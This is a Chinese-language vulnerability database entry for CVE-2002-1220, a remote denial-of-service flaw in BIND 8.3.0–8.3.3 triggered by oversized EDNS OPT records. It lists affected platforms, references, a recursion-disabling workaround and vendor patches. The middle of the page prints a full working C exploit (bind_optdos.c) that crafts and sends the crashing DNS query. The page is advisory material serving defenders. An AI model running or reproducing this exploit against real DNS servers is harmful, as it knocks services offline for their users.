CVE-2002-1220
CVSS5.0
发布时间 :2002-11-29 00:00:00
修订时间 :2016-10-17 22:24:53
NMCOES    

[原文]BIND 8.3.x through 8.3.3 allows remote attackers to cause a denial of service (termination due to assertion failure) via a request for a subdomain that does not exist, with an OPT resource record with a large UDP payload size.


[CNNVD]ISC BIND OPT资源记录远程拒绝服务攻击漏洞(CNNVD-200211-058)

        
        BIND是一个应用非常广泛的DNS协议的实现,由ISC(Internet Software Consortium)负责维护,具体的开发由Nominum(www.nominum.com)公司来完成。
        允许递归查询的BIND 8服务器可能会由于一个assertion失效导致意外中止。当客户端请求一个有效域名下的无效子域名时,如果该DNS请求带有超大UDP载荷长度的OPT资源记录,BIND 8在构造NXDOMAIN回复时会触发一个assertion,从而中止服务。攻击者也可以通过查询哪些权威DNS服务器不可到达的那些域名来造成这种拒绝服务攻击。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:isc:bind:8.3.0ISC BIND 8.3.0
cpe:/o:freebsd:freebsd:4.4FreeBSD 4.4
cpe:/o:freebsd:freebsd:4.5FreeBSD 4.5
cpe:/a:isc:bind:8.3.3ISC BIND 8.3.3
cpe:/o:openbsd:openbsd:3.0OpenBSD 3.0
cpe:/a:isc:bind:8.3.1ISC BIND 8.3.1
cpe:/a:isc:bind:8.3.2ISC BIND 8.3.2
cpe:/o:freebsd:freebsd:4.6FreeBSD 4.6
cpe:/o:freebsd:freebsd:4.7FreeBSD 4.7
cpe:/o:openbsd:openbsd:3.2OpenBSD 3.2
cpe:/o:openbsd:openbsd:3.1OpenBSD 3.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:449Bind OPT Resource Record DoS Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1220
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1220
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200211-058
(官方数据源) CNNVD

- 其它链接及资源

http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469
(VENDOR_ADVISORY)  ISS  20021112 Multiple Remote Vulnerabilities in BIND4 and BIND8
http://lists.apple.com/archives/Security-announce/2002/Nov/msg00000.html
(UNKNOWN)  APPLE  2002-11-21
http://marc.info/?l=bugtraq&m=103713117612842&w=2
(UNKNOWN)  BUGTRAQ  20021112 [Fwd: Notice of serious vulnerabilities in ISC BIND 4 & 8]
http://marc.info/?l=bugtraq&m=103763574715133&w=2
(UNKNOWN)  BUGTRAQ  20021118 TSLSA-2002-0076 - bind
http://online.securityfocus.com/advisories/4999
(UNKNOWN)  COMPAQ  SSRT2408
http://online.securityfocus.com/archive/1/300019
(UNKNOWN)  BUGTRAQ  20021115 [OpenPKG-SA-2002.011] OpenPKG Security Advisory (bind, bind8)
http://www.cert.org/advisories/CA-2002-31.html
(UNKNOWN)  CERT  CA-2002-31
http://www.ciac.org/ciac/bulletins/n-013.shtml
(UNKNOWN)  CIAC  N-013
http://www.debian.org/security/2002/dsa-196
(UNKNOWN)  DEBIAN  DSA-196
http://www.isc.org/products/BIND/bind-security.html
(VENDOR_ADVISORY)  CONFIRM  http://www.isc.org/products/BIND/bind-security.html
http://www.kb.cert.org/vuls/id/229595
(UNKNOWN)  CERT-VN  VU#229595
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-077.php
(UNKNOWN)  MANDRAKE  MDKSA-2002:077
http://www.securityfocus.com/bid/6161
(UNKNOWN)  BID  6161
http://xforce.iss.net/xforce/xfdb/10332
(UNKNOWN)  XF  bind-opt-rr-dos(10332)

- 漏洞信息

ISC BIND OPT资源记录远程拒绝服务攻击漏洞
中危 其他
2002-11-29 00:00:00 2005-05-13 00:00:00
远程  
        
        BIND是一个应用非常广泛的DNS协议的实现,由ISC(Internet Software Consortium)负责维护,具体的开发由Nominum(www.nominum.com)公司来完成。
        允许递归查询的BIND 8服务器可能会由于一个assertion失效导致意外中止。当客户端请求一个有效域名下的无效子域名时,如果该DNS请求带有超大UDP载荷长度的OPT资源记录,BIND 8在构造NXDOMAIN回复时会触发一个assertion,从而中止服务。攻击者也可以通过查询哪些权威DNS服务器不可到达的那些域名来造成这种拒绝服务攻击。
        

- 公告与补丁

        临时解决方法:
        * 如果您并不需要提供递归查询, 您可以关闭之. 在大多数情况下, 递归查询都是可
         以关闭的,具体方法可参考如下步骤:
         打开BIND配置文件named.conf(例如/etc/named.conf),在options栏中增加下列行:
         recursion no;
         例如:
         options {
         ...
         recursion no;
         ...
         };
         重新起动BIND服务以使修改生效。
        * 升级到BIND 9, 例如BIND 9.2.1:
         ftp://ftp.isc.org/isc/bind9/9.2.1/bind-9.2.1.tar.gz
        厂商补丁:
        ISC
        ---
        ISC已经在BIND 4.9.11, 8.2.7, 8.3.4中修复了这一漏洞。如果您只想安装补丁修补当前BIND系统,可访问如下链接获取补丁文件:
        
        http://www.isc.org/products/BIND/bind-security.html

- 漏洞信息 (22011)

ISC BIND 8.3.x OPT Record Large UDP Denial of Service Vulnerability (EDBID:22011)
linux dos
2002-11-12 Verified
0 spybreak
N/A [点击下载]
source: http://www.securityfocus.com/bid/6161/info

ISC BIND is vulnerable to a denial of service attack. When a DNS lookup is requested on a non-existant sub-domain of a valid domain and an OPT resource record with a large UDP payload is attached, the server may fail. 

/*
 *
 * bind_optdos.c
 *
 * OPT DoS Remote Exploit for BIND 8.3.0 - 8.3.3-REL
 * Based on the bug disclosed by ISS
 *
 * (c) Spybreak (spybreak@host.sk)   November/2002
 *
 * Proof of concept exploit code
 * For educational and testing purposes only!
 *
 *
 * Usage: ./bind_optdos domain target [udp_size]
 *
 * domain - should be a nonexistent subdomain
 * of an existing one, different from the target's,
 * or a domain whose authoritative name servers are
 * unreachable
 *
 *
 * Greetz to: sd, g00bER and hysteria.sk ;-)
 *
 */

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>

#define         UDP_SIZE        65535
#define         OPT             41
#define         PORT            53
#define         MAXRESP         1024
#define         TIMEOUT         10

typedef struct {
        unsigned short rcode    : 4;
        unsigned short zero     : 3;
        unsigned short ra       : 1;
        unsigned short rd       : 1;
        unsigned short tc       : 1;
        unsigned short aa       : 1;
        unsigned short opcode   : 4;
        unsigned short qr       : 1;
} MSG_FLAGS;

typedef struct {
        unsigned short  id;
        unsigned short  flags;
        unsigned short  nqst;
        unsigned short  nansw;
        unsigned short  nauth;
        unsigned short  nadd;
} DNS_MSG_HDR;

void usage(char *argv0)
{
        printf("********************************************\n"
               "*    OPT DoS Exploit for BIND 8.3.[0-3]    *\n"
               "*       (c) Spybreak   November/2002       *\n"
               "********************************************\n");
        printf("\n%s domain target [udp_size]\n\n", argv0);
        exit(0);
}

void sig_alrm(int signo)
{
  printf("No response yet, the target BIND seems to be down\n");
  exit(0);
}

main(int argc, char **argv)
{
  struct sockaddr_in targ_addr;
  struct hostent *he;
  MSG_FLAGS fl;
  DNS_MSG_HDR hdr;
  unsigned char qname[512], buff[1024];
  unsigned char *bu, *dom, *dot;
  int msg_size, dom_len, sockfd, n;
  unsigned short udp_size = UDP_SIZE;
  char response[MAXRESP + 1];

  if (argc < 3)
        usage(argv[0]);
  if (argc == 4)
        udp_size = (unsigned short) atoi(argv[3]);

  if (!(he = gethostbyname(argv[2]))) {
        printf("Invalid target '%s'\n", argv[2]);
        exit(-1);
  }

  printf("Query on domain: %s\nTarget: %s\n", argv[1], argv[2]);
  printf("EDNS UDP size: %u\n", udp_size);

  if (argv[1][strlen(argv[1]) - 1] == '.')
        argv[1][strlen(argv[1]) - 1] = '\0';

  strncpy(qname + 1, argv[1], sizeof(qname) - 2);
  dom = qname;

  while (dot = (unsigned char *) strchr(dom + 1, '.')) {
        *dom = dot - dom - 1;
        dom = dot;
  }
  *dom = strlen(dom + 1);
  dom_len = dom - qname + strlen(dom + 1) + 2;

  bu = buff;

  fl.qr = 0;
  fl.opcode = 0;
  fl.aa = 0;
  fl.tc = 0;
  fl.rd = 1;
  fl.ra = 0;
  fl.zero = 0;
  fl.rcode = 0;

  srand(time(0));
  hdr.id = htons((unsigned short) (65535.0*rand()/(RAND_MAX+1.0)) + 1);
  hdr.flags = htons(*((unsigned short *) &fl));
  hdr.nqst = htons(1);
  hdr.nansw = 0;
  hdr.nauth = 0;
  hdr.nadd = htons(1);

  bcopy(&hdr, bu, sizeof(hdr));
  bu += sizeof(hdr);
  bcopy(qname, bu, dom_len);
  bu += dom_len;
  *(((unsigned short *) bu)++) = htons(1);              //query type
  *(((unsigned short *) bu)++) = htons(1);              //query class

                                                        //opt rr
  *bu++ = '\0';
  *(((unsigned short *) bu)++) = htons(OPT);            //type
  *(((unsigned short *) bu)++) = htons(udp_size);       //udp payload size
  *(((unsigned int *) bu)++) = htons(0);                //extended rcode and flags
  *(((unsigned short *) bu)++) = htons(0);              //rdlen

  msg_size = bu - buff;

  bzero(&targ_addr, sizeof(targ_addr));
  targ_addr.sin_family = AF_INET;
  targ_addr.sin_port = htons(PORT);
  targ_addr.sin_addr = *(struct in_addr *) he->h_addr;

  sockfd = socket(AF_INET, SOCK_DGRAM, 0);
  if (sockfd < 0) {
        perror("socket");
        exit(-1);
  }
  n = sendto(sockfd, buff, msg_size, 0, (struct sockaddr *) &targ_addr, (socklen_t) sizeof(targ_addr));
  if (n < 0) {
        perror("sendto");
        exit(-1);
  }

  printf("Datagram sent\nWaiting for response ...\n");

  signal(SIGALRM, sig_alrm);
  alarm(TIMEOUT);
  n = recvfrom(sockfd, response, MAXRESP, 0, NULL, NULL);
  alarm(0);

  printf("Response received, the target BIND seems to be still up\n");
  printf("Maybe the target is not an OPT DoS vulnerable BIND version,recursion disabled, or try to change domain/udp_size, ...\n");
  exit(0);
}

		

- 漏洞信息

9724
ISC BIND OPT Resource Record Large UDP Payload DoS
Denial of Service
Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-11-12 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

ISC BIND OPT Record Large UDP Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 6161
Yes No
2002-11-12 12:00:00 2009-07-11 07:16:00
Discovery of this vulnerability credited to Neel Mehta of ISS X-Force.

- 受影响的程序版本

Sun Solaris 9
Sun Cobalt RaQ XTR
SCO Open Server 5.0.7
SCO Open Server 5.0.6
SCO Open Server 5.0.5
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0
ISC BIND 8.3.3
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2
+ Apple Mac OS X 10.1.5
+ Apple Mac OS X 10.1.4
+ Apple Mac OS X 10.1.3
+ Apple Mac OS X 10.1.2
+ Apple Mac OS X 10.1.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2
+ Apple Mac OS X Server 10.0
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ OpenPKG OpenPKG 1.1
+ OpenPKG OpenPKG Current
ISC BIND 8.3.2
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
ISC BIND 8.3.1
ISC BIND 8.3 .0
HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 10.24
HP HP-UX 10.20
HP HP-UX 10.10
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4
Compaq Tru64 5.1 b PK1 (BL1)
Compaq Tru64 5.1 b
Compaq Tru64 5.1 a PK3 (BL3)
Compaq Tru64 5.1 a PK2 (BL2)
Compaq Tru64 5.1 a PK1 (BL1)
Compaq Tru64 5.1 a
Compaq Tru64 5.1 PK5 (BL19)
Compaq Tru64 5.1 PK4 (BL18)
Compaq Tru64 5.1 PK3 (BL17)
Compaq Tru64 5.1
Compaq Tru64 5.0 a PK3 (BL17)
Compaq Tru64 5.0 a
Compaq Tru64 4.0 g PK3 (BL17)
Compaq Tru64 4.0 g
Compaq Tru64 4.0 f PK7 (BL18)
Compaq Tru64 4.0 f PK6 (BL17)
Compaq Tru64 4.0 f
Astaro Security Linux 3.2 11
Astaro Security Linux 3.2 10
Astaro Security Linux 3.2 00
Astaro Security Linux 2.0 30
Astaro Security Linux 2.0 27
Astaro Security Linux 2.0 26
Astaro Security Linux 2.0 25
Astaro Security Linux 2.0 24
Astaro Security Linux 2.0 23
Astaro Security Linux 2.0 16
ISC BIND 9.2.1
+ Caldera OpenUnix 8.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ SCO Unixware 7.1.3
ISC BIND 9.2
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ HP HP-UX 11.11
+ HP HP-UX 11.11
+ HP HP-UX 11.0
+ HP HP-UX 11.0
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.3
ISC BIND 9.1.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
ISC BIND 9.1.2
+ Conectiva Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
ISC BIND 9.1.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
ISC BIND 9.1
+ Caldera OpenUnix 8.0
+ HP Secure OS software for Linux 1.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
ISC BIND 9.0
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
ISC BIND 8.3.4
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X Server 10.2.4
+ Apple Mac OS X Server 10.2.3
+ S.u.S.E. Linux Personal 8.2
ISC BIND 8.2.7
ISC BIND 4.9.11
Astaro Security Linux 3.2 12

- 不受影响的程序版本

ISC BIND 9.2.1
+ Caldera OpenUnix 8.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ SCO Unixware 7.1.3
ISC BIND 9.2
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ HP HP-UX 11.11
+ HP HP-UX 11.11
+ HP HP-UX 11.0
+ HP HP-UX 11.0
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.3
ISC BIND 9.1.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
ISC BIND 9.1.2
+ Conectiva Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
ISC BIND 9.1.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
ISC BIND 9.1
+ Caldera OpenUnix 8.0
+ HP Secure OS software for Linux 1.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
ISC BIND 9.0
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
ISC BIND 8.3.4
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X Server 10.2.4
+ Apple Mac OS X Server 10.2.3
+ S.u.S.E. Linux Personal 8.2
ISC BIND 8.2.7
ISC BIND 4.9.11
Astaro Security Linux 3.2 12

- 漏洞讨论

ISC BIND is vulnerable to a denial of service attack. When a DNS lookup is requested on a non-existant sub-domain of a valid domain and an OPT resource record with a large UDP payload is attached, the server may fail.

- 漏洞利用

The following proof of concept code has been supplied by Spybreak &lt;spybreak@host.sk&gt;:

- 解决方案

Sun have released a security update to address this issue in the RAQ XTR. Please see references section for further details. A fix is linked below.

SCO has released a security advisory to address this issue in OpenServer (CSSA-2003-SCO.17.1). Further information relating to obtaining and applying fixes can be found in the referenced advisory.

HP has released a revised advisory (HPSBUX0208-209(rev.15)) to address this issue in affected HP-UX systems. Customers who are affected by this issue are advised to apply appropriate patches. Further information regarding obtaining and applying patches is available in the referenced advisory.

ISC has stated that new versions of BIND will be available in the near future. Users are advised to contact ISC for further details. ISC has released patches for some versions.

HP has released an updated advisory HPSBUX0208-209(rev.14) for HP-UX systems. Preliminary updates for HP-UX 11 and 11.11 are available. Further information on obtaining and applying fixes is available in the referenced HP advisory (HPSBUX0208-209).

FreeBSD has released an advisory. Users are advised to update systems to the 4.7-STABLE branch or to the appropriate RELENG_4_x branch dated after the correction date. A patch is also available. Further details on obtaining and applying fixes can be found in the referenced advisory.

EnGarde Secure Linux has released an advisory. Further information about obtaining and applying fixes can be found in the referenced advisory.

SuSE has released an advisory. Updated packages are available. Further information about obtaining and applying fixes can be found in the referenced advisory.

Mandrake has released an advisory (MDKSA-2002:077) containing fix information. Further information about obtaining and applying fixes can be found in the referenced advisory.

Debian has released an advisory (DSA 196-1) containing fix information. Further information about obtaining and applying fixes can be found in the referenced advisory.

Conectiva has released an advisory (CLA-2002:546) containing fix information. Further information about obtaining and applying fixes can be found in the referenced advisory.

OpenPKG has released an advisory containing upgrades for this and other vulnerabilities. OpenPKG 1.0 users are advised to upgrade to the bind-8.2.6-1.0.2 package or later. OpenPKG 1.1 users are advised to upgrade to the bind8-8.3.3-1.1.1 package or later. OpenPKG CURRENT users are advised to upgrade to the bind8-8.3.3-20021114 package or later. bind-9.2.1-1.1.0 packages are also available for OpenPKG 1.1/CURRENT. Further details on obtaining and applying fixes can be found in the attached reference.

This issue is present in Astaro Security Linux versions prior to Up2Date 3.212. Up2Date 3.211 is the minimum version required for users to install Up2Date 3.212.

Trustix Secure Linux has released an advisory. Further details about obtaining and applying fixes can be found in the referenced advisory.

NetBSD has released an advisory. Details about upgrading vulnerable packages through CVS can be found in the referenced advisory.

SCO has released an advisory and fixes for OpenLinux.

SCO has released a security advisory (CSSA-2003-SCO.2). Information, on obtaining and applying fixes, can be gathered from the reverenced advisory.

Sun recommends disabling recursion if not needed. Patches are available.

Apple has patched this issue in MacOS X versions 10.2.3 and later. See referenced web page for additional details.

Fixes are available:


OpenBSD OpenBSD 3.2

OpenBSD OpenBSD 3.0

Sun Cobalt RaQ XTR

Sun Solaris 9

OpenBSD OpenBSD 3.1

HP HP-UX 10.10

HP HP-UX 10.20

HP HP-UX 11.0 4

HP HP-UX 11.0

HP HP-UX 11.11

HP HP-UX 11.22

Compaq Tru64 4.0 f PK6 (BL17)

Compaq Tru64 4.0 g PK3 (BL17)

Compaq Tru64 4.0 g

Compaq Tru64 4.0 f

Compaq Tru64 4.0 f PK7 (BL18)

FreeBSD FreeBSD 4.4

FreeBSD FreeBSD 4.5

FreeBSD FreeBSD 4.6

FreeBSD FreeBSD 4.7

Compaq Tru64 5.0 a PK3 (BL17)

Compaq Tru64 5.0 a

Compaq Tru64 5.1 PK4 (BL18)

Compaq Tru64 5.1 b PK1 (BL1)

Compaq Tru64 5.1 a

Compaq Tru64 5.1

Compaq Tru64 5.1 PK5 (BL19)

Compaq Tru64 5.1 a PK1 (BL1)

Compaq Tru64 5.1 a PK2 (BL2)

Compaq Tru64 5.1 a PK3 (BL3)

Compaq Tru64 5.1 b

Compaq Tru64 5.1 PK3 (BL17)

ISC BIND 8.3.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站